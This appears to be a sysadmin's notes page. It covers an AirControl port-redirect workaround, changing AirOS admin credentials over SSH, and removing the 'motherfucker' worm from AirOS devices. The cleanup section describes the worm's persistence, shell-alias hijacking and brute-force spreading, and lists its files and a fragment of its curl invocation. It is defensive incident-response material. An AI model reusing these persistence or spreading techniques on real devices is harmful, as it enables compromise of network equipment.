There is a Problem with Aircontrol 1 (version 1.4.2-beta.3839), that the HTTP
connection antenna to server tries to connect to port 22 on the serverside, no
matter what is configured in the Aircontrol server settings (there port 9080
Settings in Aircontrol Server
Admin / System Settings Default Device SSH Port 22
AirControl Server Address name-of-the-server.domain AirControl Server HTTP Port 9080
After provisioning the antenna we check the settings on the antenna via CLI: $ mca-ctrl -t status
So the correct server port is not set, instead the server sets (server) port
22. Of course on the server on port 22 nothing is listening for the
connection from the antenna.
The heartbeat gets through if I manually set the correct port on the antenna
After that the antenna comes online instantly. Of course the setting is lost as
soon as the antenna is disconnected / unprovisioned, each timer after
reconnecting the correct port has to be set again. That is of course too
The easier way is to make the server listen on port 22. Since there is no way
to change the server port it is easier to create a port redirect with iptables.
On the server run (adapted if necessary): # iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 22 -j REDIRECT --to-port 9080
After that all antennas come online by themselves. mca-ctrl -t connect -s http://name-of-the-server.domain:22/heartbeat
How to change password and admin user on AirOS device via command line
interface and ssh
Such a change might be necessary if the password is not accepted by the login
of the webinterface, e.g. because it is too long.
If you make these changes yourself step by step it is important to sync all
changes, otherwise you can easily lock out yourself of your antenna (and having
to drive to a remote place for resetting your antenna is never what you want).
This is exactly what is done by the webinterface if you change username or
Add a new line for the new admin into /etc/passwd, copy & paste from another
device, hash type / length should be the same (to be on the safe side). The
line for the old admin can stay there, it will be deleted automatically later.
Edit /tmp/system.cfg and look for the lines users.1.name=adminusername
Edit users.1.name to correspond with the username added to /etc/passwd
copy&paste the password hash from this user's line in /etc/passwd to /tmp/systemf.cfg
run cfgmtd -p /etc/ -w
The public key authentication set up previously (as a backup in case something
went wrong with the passwords) will automatically work for the new admin user
You can log in via ssh with all usernames that are listed in /etc/passwd.
When rebooting all other admin usernames apart from the one set as
users.1.name will be removed from /etc/passwd
How to remove the motherfucker virus / worm
It is written rather simple and can be removed without any major problems.
The virus does (at least) the following things:
Create a system account (mother, moth3r, motherfucker or similar)
store and camouflage its files somewhere on the filesystem
make sure it gets loaded at every reboot
scan the network around him to distribute itself aka infect other devices
set aliases for the shell so it gets run / loaded e.g. when the user runs the ps command (nice one! :) )
There are 3 variants of the motherfucker virus.
All the files of the virus are located in /etc/persistent
the virus itself
startscript to load and run itself at every boot
directory for dropbear settings, public keys etc
Commands to remove the worm cd /etc/persistent/
rm -R .mf
sed -i "/^mother/d" /etc/passwd
(or open it in vi and delete the respective line) cfgmtd -p /etc/ -w
All the files of the virus are located in /var/lib/dhcp
Probably motherfucker can use /var/lib/dhcp/.ssh/authorized_keys, so you have
to write your own key (via exploit) into that file to be able to login, if your
password doesn't work
rm -r /var/lib/dhcp
The virus writes itself to /var/bin/cgi and runs itself at every boot from
most sophisticated variant
XM.v5.5.6# ls -la .mf
drwxrwxr-x 2 moth3r admin 240 May 28 2013 .
drwxr-xr-x 4 moth3r admin 200 May 28 2013 ..
-rwxrwxr-x 1 moth3r admin 1529 Jun 3 2016 download
-rwxr-xr-x 1 moth3r admin 1517 Dec 12 19:19 infect
-rw------- 1 moth3r admin 806 May 25 2016 mfid
-rw-r--r-- 1 moth3r admin 395 May 25 2016 mfid.pub
-rwxrwxr-x 1 moth3r admin 2847 Jun 3 2016 mother
-rwxrwxr-x 1 moth3r admin 577 Jun 1 2016 p
-rw-rw-r-- 1 moth3r admin 161 May 30 2016 passlst
-rw-rw-r-- 1 moth3r admin 84 May 25 2016 passwd
-rwxrwxr-x 1 moth3r admin 1206 May 31 2016 scan
-rwxrwxr-x 1 moth3r admin 411 May 30 2016 sprd
download: download itself
infect: infect other vulernable devices
mother: run discover to find devices, write result to file, infect found devices, change SSID and do other fancy stuff
p: check if account moth3r exists, if not create it, modify startscripts, empty authorized_keys, write config, reboot
passlst: password file for brute force attack
passwd: passwd file to be copied to /etc/passwd
scan: scan and infect my own subnet
sprd: infect other random IP addresses
sh -c LD_LIBRARY_PATH=/etc/persistent/.mf/ ./curl -s
rm -r .mf
After successful cleaning update your firmware immediately! Otherwise your
device will be infected soon again.